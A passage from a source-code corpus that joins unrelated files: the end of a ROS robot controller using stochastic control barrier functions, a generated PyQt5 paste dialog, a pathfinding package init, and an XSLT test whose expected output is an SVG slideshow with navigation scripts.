            ff[len(u_s)+2*len(UnsafeList):len(u_s)+2*len(UnsafeList)+len(Map.set)] = 20
            ff[-1] = np.ceil(self.count/100.0)
        else:
            #Ax<=b, x = [v, w , b1, b2,..., bn, b'1, b'2,b'm, delta ]
            # where b is constant in Eq (14) of paper "Risk-bounded Control using Stochastic Barrier Functions"
            #b' is the slack variable for map constraints
            # delta is for lyapunov function
            A = np.zeros((2*len(UnsafeList)+2*len(u_s)+len(Map.set)+2,len(u_s)+len(UnsafeList)+len(Map.set)+1))
            b =np.zeros((2*len(u_s)+2*len(UnsafeList)+len(Map.set)+2))
            for j in range(len(UnsafeList)):
                # CBF Constraints
                A[2*j,np.append(np.arange(len(u_s)),[len(u_s)+j])] = [Unsafe.multCond(x_r, x_o[UnsafeList[j]][0:2],[1, 0]), Unsafe.multCond(x_r,x_o[UnsafeList[j]][0:2],[0, 1]), -1] # multiplier of u , bi
                b[2*j] = -ai* Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])- Unsafe.ConstCond(x_r, x_o[UnsafeList[j]][0:2],u_o[UnsafeList[j]])
                # Constraints on bi to satisfy pi risk
                A[2*j+1,len(u_s)+j] = 1
                if Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2])<1:
                    b[2*j+1] = min(ai, -1/T*log((1-risk)/(1-Unsafe.CBF(x_r, x_o[UnsafeList[j]][0:2]))))
                else:
                    b[2*j+1] = 0
            # Adding U constraint
            A[2*len(UnsafeList),0] = 1; b[2*len(UnsafeList)] = U[0,1]
            A[2*len(UnsafeList)+1,0] = -1; b[2*len(UnsafeList)+1] = -U[0,0]
            A[2*len(UnsafeList)+2,1] = 1; b[2*len(UnsafeList)+2] = U[1,1]
            A[2*len(UnsafeList)+3,1] = -1; b[2*len(UnsafeList)+3] = -U[1,0]
            # Adding map constraints
            for j in range(len(Map.set)):
                A[2*len(UnsafeList)+2*len(u_s)+j,np.append(np.arange(len(u_s)),[len(u_s)+len(UnsafeList)+j])] = [Map.setDer[j](x_r,[1, 0]), Map.setDer[j](x_r,[0, 1]), -1]
                b[2*len(UnsafeList)+2*len(u_s)+j] = -Map.CBF[j](x_r)
            # Adding Goal based Lyapunov !!!!!!!!!!!!!!!!! Needs to be changed for a different example
            A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),0:2] = [Goal.Lyap(x_r,[1,0]), Goal.Lyap(x_r,[0, 1])]
            A[2*len(UnsafeList)+2*len(u_s)+len(Map.set),-1] = -1
            b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)] = 0
            A[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1,-1] = 1
            b[2*len(UnsafeList)+2*len(u_s)+len(Map.set)+1] = np.finfo(float).eps+1
            H = np.zeros((len(u_s)+len(UnsafeList)+len(Map.set)+1,len(u_s)+len(UnsafeList)+len(Map.set)+1))
            H[0,0] = 0
            H[1,1] = 0
            ff = np.zeros((len(u_s)+len(UnsafeList)+len(Map.set)+1,1))
            ff[len(u_s):len(u_s)+len(UnsafeList)] = 20
            ff[len(u_s)+len(UnsafeList):len(u_s)+len(UnsafeList)+len(Map.set)] = 10
            ff[-1] = np.ceil(self.count/100.0)
        try:
            uq = cvxopt_solve_qp(H, ff, A, b)
        except ValueError:
            uq = [0,0]
            rospy.loginfo('Domain Error in cvx')
        if uq is None:
            uq = [0,0]
            rospy.loginfo('infeasible QP')
        # Log the realised risk bound implied by the chosen slack values.
        if findBestCommandAnyway and len(uq[2:len(uq)-2*len(Map.set)-1:2])>0: # If humans are around and findbestcommand active
            if InUnsafe:
                self.trajs.risk.append(1.0)
            else:
                r = np.zeros(len(uq[2:len(uq)-2*len(Map.set)-1:2]))
                for k in range(len(uq[2:len(uq)-2*len(Map.set)-1:2])):
                    r[k] = min(1, max(0,1-(1-Unsafe.CBF(x_r, x_o[UnsafeList[k]][0:2]))*exp(-uq[2*k+2]*T)))
                self.trajs.risk.append(max(r))
        elif not findBestCommandAnyway and len(uq[2:len(uq)-len(Map.set)-1])>0:
            r = np.zeros(len(uq[2:len(uq)-len(Map.set)-1]))
            for k in range(len(uq[2:len(uq)-len(Map.set)-1])):
                r[k] = min(1, max(0,1-(1-Unsafe.CBF(x_r, x_o[UnsafeList[k]][0:2]))*exp(-uq[k+2]*T)))
            self.trajs.risk.append(max(r))
            if max(r)>0.1:
                1  # NOTE(review): no-op, likely a leftover breakpoint anchor
        elif not findBestCommandAnyway and len(uq) == 2: # feasible solution is not found
            self.trajs.risk.append(-risk) # meaning that solution is not found
        else: # No human is around
            self.trajs.risk.append(0.0)
        self.trajs.minDist.append(minDist)
        return uq
if __name__ == '__main__':
    ## Parameters
    # These module-level names are read as globals by plottrajs,
    # robot.MapFuncs and CBF_CONTROLLER.cbf_controller_compute.
    findBestCommandAnyway = 1 #make this zero if you don't want to do anything if it's riskier than intended
    #use 1 if you want to do the best even if there is risk
    plotanimation = 0
    # Goal info
    GoalCenter = np.array([0, 0])
    rGoal = np.power(0.5,2)  # squared goal radius
    # Unsafe
    UnsafeInclude = 9 # consider obstacle if in radius
    UnsafeRadius = 0.5 #radius of unsafe sets/distance from obstacles
    # Enviroment Bounds
    env_bounds = type('', (), {})()
    env_bounds.y_min = -1.2
    env_bounds.y_max = 1
    # env_bounds.x_max = 1.25
    # env_bounds.x_min = -1.35
    l = 0.01 #bicycle model approximation parameter
    U = np.array([[-0.33,0.33],[-0.3,0.3]])  # input bounds [[v_min,v_max],[w_min,w_max]]
    T = 1 #Lookahead horizon
    risk = 0.1 # max risk desired
    gamma = 5 # CBF coefficient
    u1d = 0 # desired input to save energy!
    # Plotting options
    plotit = 1
    plotlanes = 1
    # NOTE(review): this rebinding shadows the `robot` class with an
    # instance; nothing below can construct a second robot.
    robot = robot(l)
    GoalInfo = robot.GoalFuncs(GoalCenter,rGoal)
    UnsafeInfo = robot.UnsafeFuncs(gamma,UnsafeRadius)
    MapInfo = robot.MapFuncs(env_bounds)
    # Process arguments
    p = argparse.ArgumentParser(description='CBF controller')
    args = p.parse_args(rospy.myargv()[1:])
    try:
        rospy.init_node('cbf_controller')
        cbf_controller = CBF_CONTROLLER(robot,GoalInfo,UnsafeInfo,MapInfo)
        control_priod = 0.05 #[sec] we can change controll priod with this parameter.
        rospy.Timer(rospy.Duration(control_priod), cbf_controller.controller_loop_callback)
        rospy.spin()
    except rospy.ROSInterruptException:
        pass
    # After shutdown, visualise the logged run.
    plottrajs(cbf_controller.trajs)
src/gui/ui_paste_dialog.py | tonypdmtr/sxtool | 3 | 16915 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'src/gui/ui_paste_dialog.ui'
#
# Created by: PyQt5 UI code generator 5.11.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_PasteDialog(object):
    """Auto-generated (pyuic5) UI class for the paste-mode dialog.

    Do not hand-edit logic here — regenerate from the .ui file instead.
    Builds three radio-button groups (paste mode, add position, replace
    behaviour) plus OK/Cancel, and wires the mode radios to enable the
    matching sub-group.
    """
    def setupUi(self, PasteDialog):
        """Create and lay out all widgets on `PasteDialog`."""
        PasteDialog.setObjectName("PasteDialog")
        PasteDialog.resize(403, 205)
        self.gridLayout = QtWidgets.QGridLayout(PasteDialog)
        self.gridLayout.setContentsMargins(11, 11, 11, 11)
        self.gridLayout.setSpacing(6)
        self.gridLayout.setObjectName("gridLayout")
        # "Pasting mode" group: add lines vs replace selection.
        self.buttonGroupMain = QtWidgets.QGroupBox(PasteDialog)
        self.buttonGroupMain.setObjectName("buttonGroupMain")
        self.radioReplaceSelection = QtWidgets.QRadioButton(self.buttonGroupMain)
        self.radioReplaceSelection.setGeometry(QtCore.QRect(10, 40, 120, 20))
        self.radioReplaceSelection.setObjectName("radioReplaceSelection")
        self.radioAddLines = QtWidgets.QRadioButton(self.buttonGroupMain)
        self.radioAddLines.setGeometry(QtCore.QRect(10, 20, 100, 20))
        self.radioAddLines.setChecked(True)
        self.radioAddLines.setObjectName("radioAddLines")
        self.gridLayout.addWidget(self.buttonGroupMain, 0, 0, 1, 1)
        # "Replace" options group (enabled only when replacing).
        self.buttonGroupReplace = QtWidgets.QGroupBox(PasteDialog)
        self.buttonGroupReplace.setEnabled(False)
        self.buttonGroupReplace.setObjectName("buttonGroupReplace")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.buttonGroupReplace)
        self.verticalLayout.setContentsMargins(11, 11, 11, 11)
        self.verticalLayout.setSpacing(6)
        self.verticalLayout.setObjectName("verticalLayout")
        self.radioSelectionOnly = QtWidgets.QRadioButton(self.buttonGroupReplace)
        self.radioSelectionOnly.setObjectName("radioSelectionOnly")
        self.verticalLayout.addWidget(self.radioSelectionOnly)
        self.radioSelectionAndReplace = QtWidgets.QRadioButton(self.buttonGroupReplace)
        self.radioSelectionAndReplace.setObjectName("radioSelectionAndReplace")
        self.verticalLayout.addWidget(self.radioSelectionAndReplace)
        self.radioSelectionAndAdd = QtWidgets.QRadioButton(self.buttonGroupReplace)
        self.radioSelectionAndAdd.setChecked(True)
        self.radioSelectionAndAdd.setObjectName("radioSelectionAndAdd")
        self.verticalLayout.addWidget(self.radioSelectionAndAdd)
        self.gridLayout.addWidget(self.buttonGroupReplace, 0, 1, 2, 1)
        # "Add" options group (enabled only when adding lines).
        self.buttonGroupAdd = QtWidgets.QGroupBox(PasteDialog)
        self.buttonGroupAdd.setEnabled(True)
        self.buttonGroupAdd.setObjectName("buttonGroupAdd")
        self.radioAfterSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
        self.radioAfterSelection.setGeometry(QtCore.QRect(10, 40, 130, 20))
        self.radioAfterSelection.setObjectName("radioAfterSelection")
        self.radioBeforeSelection = QtWidgets.QRadioButton(self.buttonGroupAdd)
        self.radioBeforeSelection.setGeometry(QtCore.QRect(10, 20, 140, 20))
        self.radioBeforeSelection.setChecked(True)
        self.radioBeforeSelection.setObjectName("radioBeforeSelection")
        self.gridLayout.addWidget(self.buttonGroupAdd, 1, 0, 1, 1)
        self.pushOk = QtWidgets.QPushButton(PasteDialog)
        self.pushOk.setObjectName("pushOk")
        self.gridLayout.addWidget(self.pushOk, 2, 0, 1, 1)
        self.pushCancel = QtWidgets.QPushButton(PasteDialog)
        self.pushCancel.setObjectName("pushCancel")
        self.gridLayout.addWidget(self.pushCancel, 2, 1, 1, 1)
        self.retranslateUi(PasteDialog)
        # Signal wiring: OK/Cancel close the dialog; mode radios toggle
        # which option group is enabled.
        self.pushOk.clicked.connect(PasteDialog.accept)
        self.pushCancel.clicked.connect(PasteDialog.reject)
        self.radioAddLines.toggled['bool'].connect(self.buttonGroupAdd.setEnabled)
        self.radioReplaceSelection.toggled['bool'].connect(self.buttonGroupReplace.setEnabled)
        QtCore.QMetaObject.connectSlotsByName(PasteDialog)
    def retranslateUi(self, PasteDialog):
        """Set all user-visible strings (translation entry point)."""
        _translate = QtCore.QCoreApplication.translate
        PasteDialog.setWindowTitle(_translate("PasteDialog", "Paste mode"))
        self.buttonGroupMain.setTitle(_translate("PasteDialog", "Pasting mode"))
        self.radioReplaceSelection.setText(_translate("PasteDialog", "Replace selection"))
        self.radioAddLines.setText(_translate("PasteDialog", "Add lines"))
        self.buttonGroupReplace.setTitle(_translate("PasteDialog", "How do you want to replace lines ?"))
        self.radioSelectionOnly.setText(_translate("PasteDialog", "Selection only"))
        self.radioSelectionAndReplace.setText(_translate("PasteDialog", "If selection is too small, replace\n"
"the lines after"))
        self.radioSelectionAndAdd.setText(_translate("PasteDialog", "If selection is too small, \n"
"add new lines"))
        self.buttonGroupAdd.setTitle(_translate("PasteDialog", "Where do you want to add lines ?"))
        self.radioAfterSelection.setText(_translate("PasteDialog", "After selection"))
        self.radioBeforeSelection.setText(_translate("PasteDialog", "Before selection"))
        self.pushOk.setText(_translate("PasteDialog", "OK"))
        self.pushCancel.setText(_translate("PasteDialog", "Cancel"))
| 2.0625 | 2 |
app/pathfinding/finder/__init__.py | TheronHa/Spaghetti | 208 | 16916 | __all__ = ['a_star', 'best_first', 'bi_a_star', 'breadth_first', 'dijkstra',
'finder', 'ida_star']
| 1.328125 | 1 |
dependencies/src/4Suite-XML-1.0.2/test/Xml/Xslt/Borrowed/uo_20000929.py | aleasims/Peach | 0 | 16917 | <reponame>aleasims/Peach
#Uche's test from Sun's SVG slide publisher
import os
from Xml.Xslt import test_harness
# Stylesheet and source-document paths used by the test cases below.
#From Sun's toolkit
sheet_1_uri = "Xml/Xslt/Borrowed/svgslides.xsl"
sheet_2_uri = "Xml/Xslt/Borrowed/svgslides_custom.xsl"
sheet_3_uri = "Xml/Xslt/Borrowed/slidescript.xsl"
source_1_uri = "Xml/Xslt/Borrowed/slides4svg.xml"
# Reference output from Saxon (empty placeholder here).
saxon_output = """"""
expected_1 = """<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="slides.css" type="text/css"?>
<svg height='768' width='1024' style='pointer-events:visible' xml:space='preserve' onload='initSlides(evt)' xmlns:xlink='http://www.w3.org/2000/xlink/namespace/'>
<script><![CDATA[
var doc = null;
// Called upon presentation loading
function initSlides(evt){
var target = evt.getTarget();
doc = target.getOwnerDocument();
hideAndShow(evt, curSlide, curSlide);
}
function onPrevSlide(evt){
// Process new current slide
var oldCurSlide = curSlide;
curSlide = curSlide - 1;
if(curSlide < 0){
curSlide = slideList.length - 1;
}
hideAndShow(evt, oldCurSlide, curSlide);
}
function onNextSlide(evt){
// Process new current slide
var prevSlide = curSlide;
curSlide = curSlide + 1;
if(curSlide > (slideList.length - 1)){
curSlide = 0;
}
hideAndShow(evt, prevSlide, curSlide);
// alert("onNextSlide");
}
function hideAndShow(evt, hideSlide, showSlide){
// alert("Hiding : " + hideSlide + " and showing : " + showSlide);
// Hide previous current slide and show new
// one.
var hideSlideName = slideList[hideSlide];
var showSlideName = slideList[showSlide];
/*if(hideSlideName == null)
alert("hideSlideName is null");
else
alert("hideSlideName is NOT null:" + hideSlideName);*/
var slideGroup = doc.getElementById(hideSlideName);
slideGroup.setAttribute("style", "visibility:hidden");
slideGroup = doc.getElementById(showSlideName);
slideGroup.setAttribute("style", "visibility:show");
var slideMenuItemId = slideList[hideSlide] + "MenuItem";
var menuItem = doc.getElementById(slideMenuItemId);
if(menuItem != null)
menuItem.setAttribute("class", "slideMenuItem");
slideMenuItemId = slideList[showSlide] + "MenuItem";
menuItem = doc.getElementById(slideMenuItemId);
if(menuItem != null)
menuItem.setAttribute("class", "currentSlideMenuItem");
}
function onHighlightMenuItem(evt, highlight, itemId){
var target = evt.getTarget();
var doc = target.getOwnerDocument();
var menuItem = doc.getElementById(itemId);
if(highlight == "true")
menuItem.setAttribute("class", "highlightedSlideMenuItem");
else{
var curSlideMenuItemId = slideList[curSlide] + "MenuItem";
if(curSlideMenuItemId == itemId)
menuItem.setAttribute("class", "currentSlideMenuItem");
else
menuItem.setAttribute("class", "slideMenuItem");
}
}
function onMenuItemSelected(evt, index){
// alert("Should show slide # " + index);
var oldCurSlide = curSlide;
curSlide = index;
hideAndShow(evt, oldCurSlide, index);
}
function onSetFill(evt, elementId, fillValue){
var element = doc.getElementById(elementId);
element.setAttribute("style", "fill:" + fillValue);
}
function onExpand(evt, submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:hidden");
var javaScriptCode = "window.expandNow('" + submenuGroupId + "')";
window.expandNow = expandNow;
setTimeout(javaScriptCode, 1000);
}
function expandNow(submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:show");
}
function onCollapse(evt, submenuGroupId){
var submenuGroup = doc.getElementById(submenuGroupId);
submenuGroup.setAttribute("style", "visibility:hidden");
}
]]></script>
<script><![CDATA[
var slideList = new Array();
var slideIndex = new Object();
var curSlide = 0;
slideList[0]="slideShowCover";
slideIndex["slideShowCover"] = 0;
slideList[1]="slidesetCover1";
slideIndex["slidesetCover1"] = 1;
slideList[2] = "slide1-1";
slideIndex["slide1-1"] = 2;
slideList[3]="slidesetCover2";
slideIndex["slidesetCover2"] = 3;
slideList[4] = "slide2-1";
slideIndex["slide2-1"] = 4;
slideList[5] = "slide2-2";
slideIndex["slide2-2"] = 5;
slideList[6] = "slide2-3";
slideIndex["slide2-3"] = 6;
slideList[7]="slidesetCover3";
slideIndex["slidesetCover3"] = 7;
slideList[8] = "slide3-1";
slideIndex["slide3-1"] = 8;
slideList[9] = "slide3-2";
slideIndex["slide3-2"] = 9;
]]></script>
<defs>
<linearGradient spreadMethod='pad' id='slideBackgroundPaint' x1='0' y2='768' x2='1024' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='100%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='slideTitleSeparatorPaint' x1='0' y2='0' x2='1024' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:rgb(23, 27, 77); stop-opacity:1;'/>
<stop offset='.5' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:rgb(23, 27, 77); stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='menuBarPaint' x1='0' y2='0' x2='210' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='50%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:white; stop-opacity:1;'/>
</linearGradient>
<linearGradient spreadMethod='pad' id='slideBackgroundHeaderPaint' x1='0' y2='100' x2='0' y1='0' gradientUnits='userSpaceOnUse'>
<stop offset='0%' style='stop-color:black; stop-opacity:1;'/>
<stop offset='50%' style='stop-color:rgb(103, 107, 157); stop-opacity:1;'/>
<stop offset='100%' style='stop-color:white; stop-opacity:1;'/>
</linearGradient>
<g id='stripePattern'>
<g style='fill:black; fill-opacity:.25'>
<rect height='2' width='1' y='0'/>
<rect height='2' width='1' y='4'/>
<rect height='2' width='1' y='8'/>
<rect height='2' width='1' y='12'/>
<rect height='2' width='1' y='16'/>
<rect height='2' width='1' y='20'/>
<rect height='2' width='1' y='24'/>
<rect height='2' width='1' y='28'/>
<rect height='2' width='1' y='32'/>
<rect height='2' width='1' y='36'/>
<rect height='2' width='1' y='40'/>
<rect height='2' width='1' y='44'/>
<rect height='2' width='1' y='48'/>
<rect height='2' width='1' y='52'/>
<rect height='2' width='1' y='56'/>
<rect height='2' width='1' y='60'/>
<rect height='2' width='1' y='64'/>
<rect height='2' width='1' y='68'/>
<rect height='2' width='1' y='72'/>
<rect height='2' width='1' y='76'/>
<rect height='2' width='1' y='80'/>
<rect height='2' width='1' y='84'/>
<rect height='2' width='1' y='88'/>
<rect height='2' width='1' y='92'/>
<rect height='2' width='1' y='96'/>
<rect height='2' width='1' y='100'/>
<rect height='2' width='1' y='104'/>
<rect height='2' width='1' y='108'/>
<rect height='2' width='1' y='112'/>
<rect height='2' width='1' y='116'/>
<rect height='2' width='1' y='120'/>
<rect height='2' width='1' y='124'/>
<rect height='2' width='1' y='128'/>
<rect height='2' width='1' y='132'/>
<rect height='2' width='1' y='136'/>
<rect height='2' width='1' y='140'/>
<rect height='2' width='1' y='144'/>
<rect height='2' width='1' y='148'/>
<rect height='2' width='1' y='152'/>
<rect height='2' width='1' y='156'/>
<rect height='2' width='1' y='160'/>
<rect height='2' width='1' y='164'/>
<rect height='2' width='1' y='168'/>
<rect height='2' width='1' y='172'/>
<rect height='2' width='1' y='176'/>
<rect height='2' width='1' y='180'/>
<rect height='2' width='1' y='184'/>
<rect height='2' width='1' y='188'/>
<rect height='2' width='1' y='192'/>
<rect height='2' width='1' y='196'/>
<rect height='2' width='1' y='200'/>
<rect height='2' width='1' y='204'/>
<rect height='2' width='1' y='208'/>
<rect height='2' width='1' y='212'/>
<rect height='2' width='1' y='216'/>
<rect height='2' width='1' y='220'/>
<rect height='2' width='1' y='224'/>
<rect height='2' width='1' y='228'/>
<rect height='2' width='1' y='232'/>
<rect height='2' width='1' y='236'/>
<rect height='2' width='1' y='240'/>
<rect height='2' width='1' y='244'/>
<rect height='2' width='1' y='248'/>
<rect height='2' width='1' y='252'/>
<rect height='2' width='1' y='256'/>
<rect height='2' width='1' y='260'/>
<rect height='2' width='1' y='264'/>
<rect height='2' width='1' y='268'/>
<rect height='2' width='1' y='272'/>
<rect height='2' width='1' y='276'/>
<rect height='2' width='1' y='280'/>
<rect height='2' width='1' y='284'/>
<rect height='2' width='1' y='288'/>
<rect height='2' width='1' y='292'/>
<rect height='2' width='1' y='296'/>
<rect height='2' width='1' y='300'/>
<rect height='2' width='1' y='304'/>
<rect height='2' width='1' y='308'/>
<rect height='2' width='1' y='312'/>
<rect height='2' width='1' y='316'/>
<rect height='2' width='1' y='320'/>
<rect height='2' width='1' y='324'/>
<rect height='2' width='1' y='328'/>
<rect height='2' width='1' y='332'/>
<rect height='2' width='1' y='336'/>
<rect height='2' width='1' y='340'/>
<rect height='2' width='1' y='344'/>
<rect height='2' width='1' y='348'/>
<rect height='2' width='1' y='352'/>
<rect height='2' width='1' y='356'/>
<rect height='2' width='1' y='360'/>
<rect height='2' width='1' y='364'/>
<rect height='2' width='1' y='368'/>
<rect height='2' width='1' y='372'/>
<rect height='2' width='1' y='376'/>
<rect height='2' width='1' y='380'/>
<rect height='2' width='1' y='384'/>
<rect height='2' width='1' y='388'/>
<rect height='2' width='1' y='392'/>
<rect height='2' width='1' y='396'/>
<rect height='2' width='1' y='400'/>
<rect height='2' width='1' y='404'/>
<rect height='2' width='1' y='408'/>
<rect height='2' width='1' y='412'/>
<rect height='2' width='1' y='416'/>
<rect height='2' width='1' y='420'/>
<rect height='2' width='1' y='424'/>
<rect height='2' width='1' y='428'/>
<rect height='2' width='1' y='432'/>
<rect height='2' width='1' y='436'/>
<rect height='2' width='1' y='440'/>
<rect height='2' width='1' y='444'/>
<rect height='2' width='1' y='448'/>
<rect height='2' width='1' y='452'/>
<rect height='2' width='1' y='456'/>
<rect height='2' width='1' y='460'/>
<rect height='2' width='1' y='464'/>
<rect height='2' width='1' y='468'/>
<rect height='2' width='1' y='472'/>
<rect height='2' width='1' y='476'/>
<rect height='2' width='1' y='480'/>
<rect height='2' width='1' y='484'/>
<rect height='2' width='1' y='488'/>
<rect height='2' width='1' y='492'/>
<rect height='2' width='1' y='496'/>
<rect height='2' width='1' y='500'/>
<rect height='2' width='1' y='504'/>
<rect height='2' width='1' y='508'/>
<rect height='2' width='1' y='512'/>
<rect height='2' width='1' y='516'/>
<rect height='2' width='1' y='520'/>
<rect height='2' width='1' y='524'/>
<rect height='2' width='1' y='528'/>
<rect height='2' width='1' y='532'/>
<rect height='2' width='1' y='536'/>
<rect height='2' width='1' y='540'/>
<rect height='2' width='1' y='544'/>
<rect height='2' width='1' y='548'/>
<rect height='2' width='1' y='552'/>
<rect height='2' width='1' y='556'/>
<rect height='2' width='1' y='560'/>
<rect height='2' width='1' y='564'/>
<rect height='2' width='1' y='568'/>
<rect height='2' width='1' y='572'/>
<rect height='2' width='1' y='576'/>
<rect height='2' width='1' y='580'/>
<rect height='2' width='1' y='584'/>
<rect height='2' width='1' y='588'/>
<rect height='2' width='1' y='592'/>
<rect height='2' width='1' y='596'/>
<rect height='2' width='1' y='600'/>
<rect height='2' width='1' y='604'/>
<rect height='2' width='1' y='608'/>
<rect height='2' width='1' y='612'/>
<rect height='2' width='1' y='616'/>
<rect height='2' width='1' y='620'/>
<rect height='2' width='1' y='624'/>
<rect height='2' width='1' y='628'/>
<rect height='2' width='1' y='632'/>
<rect height='2' width='1' y='636'/>
<rect height='2' width='1' y='640'/>
<rect height='2' width='1' y='644'/>
<rect height='2' width='1' y='648'/>
<rect height='2' width='1' y='652'/>
<rect height='2' width='1' y='656'/>
<rect height='2' width='1' y='660'/>
<rect height='2' width='1' y='664'/>
<rect height='2' width='1' y='668'/>
<rect height='2' width='1' y='672'/>
<rect height='2' width='1' y='676'/>
<rect height='2' width='1' y='680'/>
<rect height='2' width='1' y='684'/>
<rect height='2' width='1' y='688'/>
<rect height='2' width='1' y='692'/>
<rect height='2' width='1' y='696'/>
<rect height='2' width='1' y='700'/>
<rect height='2' width='1' y='704'/>
<rect height='2' width='1' y='708'/>
<rect height='2' width='1' y='712'/>
<rect height='2' width='1' y='716'/>
<rect height='2' width='1' y='720'/>
<rect height='2' width='1' y='724'/>
<rect height='2' width='1' y='728'/>
<rect height='2' width='1' y='732'/>
<rect height='2' width='1' y='736'/>
<rect height='2' width='1' y='740'/>
<rect height='2' width='1' y='744'/>
<rect height='2' width='1' y='748'/>
<rect height='2' width='1' y='752'/>
<rect height='2' width='1' y='756'/>
<rect height='2' width='1' y='760'/>
<rect height='2' width='1' y='764'/>
<rect height='2' width='1' y='768'/>
<rect height='2' width='1' y='772'/>
<rect height='2' width='1' y='776'/>
<rect height='2' width='1' y='780'/>
<rect height='2' width='1' y='784'/>
<rect height='2' width='1' y='788'/>
<rect height='2' width='1' y='792'/>
<rect height='2' width='1' y='796'/>
</g>
</g>
<g id='bullet' transform='translate(0, -20)'>
<path style='stroke:white; stroke-width:2; fill:none' d='M0.436,1.418C7.853-1.088,16.396,1.706,19.52,7.658c2.498,4.762-0.287,10.248-6.22,12.252c-4.747,1.604-10.215-0.184-12.213-3.993c-1.599-3.048,0.183-6.559,3.981-7.842c3.038-1.026,6.538,0.118,7.816,2.556 c1.024,1.951-0.117,4.198-2.547,5.019c-1.945,0.657-4.185-0.076-5.003-1.636c-0.655-1.248,0.075-2.686,1.63-3.212c1.245-0.42,2.678,0.048,3.202,1.047'/>
</g>
</defs>
<g id='slideBackground' class='slideBackground'>
<rect height='768' style='fill:black' width='1024' x='0' y='0'/>
<rect height='668' style='fill:url(#menuBarPaint)' width='210' x='0' y='100'/>
<rect height='100' style='fill:url(#slideBackgroundHeaderPaint)' width='1024' x='0' y='0'/>
<use xlink:href='#stripePattern' transform='scale(1024, 1)'/>
<rect height='5' style='fill:url(#slideTitleSeparatorPaint)' width='1024' x='0' y='100'/>
</g>
<g id='navigationGroup' style='fill:white' transform='translate(984, 45) scale(2, 2)'>
<polygon id='prevSlideControl' onclick='onPrevSlide(evt)' onmouseover="onSetFill(evt, 'prevSlideControl', 'rgb(176, 22, 40)')" points='1 10 10 0 1 -10 1 10' onmouseout="onSetFill(evt, 'prevSlideControl', 'white')" transform='rotate(180)'/>
<polygon id='nextSlideControl' onclick='onNextSlide(evt)' onmouseover="onSetFill(evt, 'nextSlideControl', 'rgb(176, 22, 40)')" points='1 10 10 0 1 -10 1 10' onmouseout="onSetFill(evt, 'nextSlideControl', 'white')"/>
</g>
<g id='slideMenu' transform='translate(15, 130)'>
<text onclick='onMenuItemSelected(evt, 1)' class='slidesetMenuHeader' x='0' y='0'>Background and Motivation</text>
<g style='visibility:visible'>
<rect height='5' id='Expand1' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu1')" style='fill:white' width='5'/>
<rect height='5' id='Collapse1' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu1')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse1.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand1.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse1.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand1.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu1'>
<text id='slide1-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide1-1MenuItem')" onclick='onMenuItemSelected(evt, 2)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide1-1MenuItem')" class='slideMenuItem'>Why Yet Another Grap...</text>
</g>
<g transform='translate(0, 20)'>
<g>
<text onclick='onMenuItemSelected(evt, 3)' class='slidesetMenuHeader' x='0' y='0'>The ABCs of SVG</text>
<g style='visibility:visible'>
<rect height='5' id='Expand2' x='-10' y='-5' onclick="onExpand(evt, 'slideSetSubmenu2')" style='fill:white' width='5'/>
<rect height='5' id='Collapse2' x='-10' y='-5' onclick="onCollapse(evt, 'slideSetSubmenu2')" style='fill:red; visibility:hidden' width='5'>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Collapse2.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Expand2.click'/>
</rect>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='visible' begin='Collapse2.click'/>
<set fill='freeze' attributeType='CSS' attributeName='visibility' dur='0s' to='hidden' begin='Expand2.click'/>
</g>
<g style='visibility:hidden' id='slideSetSubmenu2'>
<text id='slide2-1MenuItem' x='10' y='20' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-1MenuItem')" onclick='onMenuItemSelected(evt, 4)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-1MenuItem')" class='slideMenuItem'>SVG Features</text>
<text id='slide2-2MenuItem' x='10' y='40' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-2MenuItem')" onclick='onMenuItemSelected(evt, 5)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-2MenuItem')" class='slideMenuItem'>SVG Sample Source</text>
<text id='slide2-3MenuItem' x='10' y='60' onmouseout="onHighlightMenuItem(evt, 'false', 'slide2-3MenuItem')" onclick='onMenuItemSelected(evt, 6)' onmouseover="onHighlightMenuItem(evt, 'true', 'slide2-3MenuItem')" class='slideMenuItem'>SVG Sample Output</text>
